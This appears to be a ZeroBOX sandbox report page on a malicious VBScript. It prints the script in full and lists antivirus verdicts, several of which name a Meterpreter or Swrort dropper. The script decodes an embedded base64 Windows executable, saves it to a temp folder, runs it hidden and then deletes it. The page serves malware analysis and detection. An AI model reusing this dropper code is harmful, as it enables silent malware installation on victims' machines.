popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
Function NprqGhTMA(LJUyiHHdNxnng)
pVyCmnVCRgtrLv = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
LJUyiHHdNxnng & "</B64DECODE>"
Set DjIXWDIdy = CreateObject("MSXML2.DOMDocument.3.0")
DjIXWDIdy.LoadXML(pVyCmnVCRgtrLv)
NprqGhTMA = DjIXWDIdy.selectsinglenode("B64DECODE").nodeTypedValue
set DjIXWDIdy = nothing
End Function
Function uaolOYuAfNnlm()
TAhvBSqUfYS = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANYaxIEAAAAAAAAAAOAADwMLAQI4AAIAAAAOAAAAAAAAABAAAAAQAAAAIAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAABAAAAAAgAARjoAAAIAAAAAACAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAwAABkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAKAAAAAAQAAAAAgAAAAIAAAAAAAAAAAAAAAAAACAAMGAuZGF0YQAAAJAKAAAAIAAAAAwAAAAEAAAAAAAAAAAAAAAAAAAgADDgLmlkYXRhAABkAAAAADAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAwwAAAAAAAAAAAAAAAAAAAAAC4ACBAAP/gkP8lODBAAJCQAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Dim guqNVIKWWAdlK
Set guqNVIKWWAdlK = CreateObject("Scripting.FileSystemObject")
Dim XnGIbdrmDAfIZRH
Dim JRZZOTTelwN
Set XnGIbdrmDAfIZRH = guqNVIKWWAdlK.GetSpecialFolder(2)
JRZZOTTelwN = XnGIbdrmDAfIZRH & "\" & guqNVIKWWAdlK.GetTempName()
guqNVIKWWAdlK.CreateFolder(JRZZOTTelwN)
qThQAgOSODjlh = JRZZOTTelwN & "\" & "veZkNElXSz.exe"
Dim gzISNjRSEvRR
Set gzISNjRSEvRR = CreateObject("Wscript.Shell")
TXsnzubziuBqnZA = NprqGhTMA(TAhvBSqUfYS)
Set ULpnhEEU = CreateObject("ADODB.Stream")
ULpnhEEU.Type = 1
ULpnhEEU.Open
ULpnhEEU.Write TXsnzubziuBqnZA
ULpnhEEU.SaveToFile qThQAgOSODjlh, 2
gzISNjRSEvRR.run qThQAgOSODjlh, 0, true
guqNVIKWWAdlK.DeleteFile(qThQAgOSODjlh)
guqNVIKWWAdlK.DeleteFolder(JRZZOTTelwN)
End Function
uaolOYuAfNnlm
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
MicroWorld-eScan VB:Trojan.VBS.Dropper.AG
CTX vba.trojan.generic
CAT-QuickHeal Trojan.VBS.33100
ALYac VB:Trojan.VBS.Dropper.AG
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
VirIT Clean
Symantec VBS.Heur.SNIC
ESET-NOD32 Win32/Rozena.ED
TrendMicro-HouseCall Clean
Cynet Malicious (score: 99)
BitDefender VB:Trojan.VBS.Dropper.AG
NANO-Antivirus Trojan.Script.Agent.fosjzx
ViRobot Clean
Tencent Win32.Trojan.Expkit.Ncnw
Sophos Troj/Swrort-AL
F-Secure Malware.HTML/ExpKit.Gen2
DrWeb JS.Muldrop.457
VIPRE VB:Trojan.VBS.Dropper.AG
TrendMicro HEUR_VBS.O1
CMC Clean
Emsisoft VB:Trojan.VBS.Dropper.AG (B)
huorong TrojanDropper/Agent.fg
FireEye VB:Trojan.VBS.Dropper.AG
Jiangmin Clean
Varist VBS/Agent.AJU!Eldorado
Avira HTML/ExpKit.Gen2
Fortinet VBS/Rozena.ED!tr
Antiy-AVL Clean
Kingsoft Win32.Infected.AutoInfector.a
Gridinsoft Clean
Xcitium TrojWare.VBS.TrojanDropper.Agent.NJA@833icd
Arcabit VB:Trojan.VBS.Dropper.AG
SUPERAntiSpyware Clean
Microsoft Trojan:Win32/Meterpreter.RPZ!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
TACHYON Clean
Zoner Clean
Rising Dropper.Ploty!8.EEC8 (TOPIS:E0:JqyfiJ1QMlQ)
Yandex Clean
Ikarus Trojan.Win32.Swrort
GData VB:Trojan.VBS.Dropper.AG
Panda Clean
alibabacloud Clean
No IRMA results available.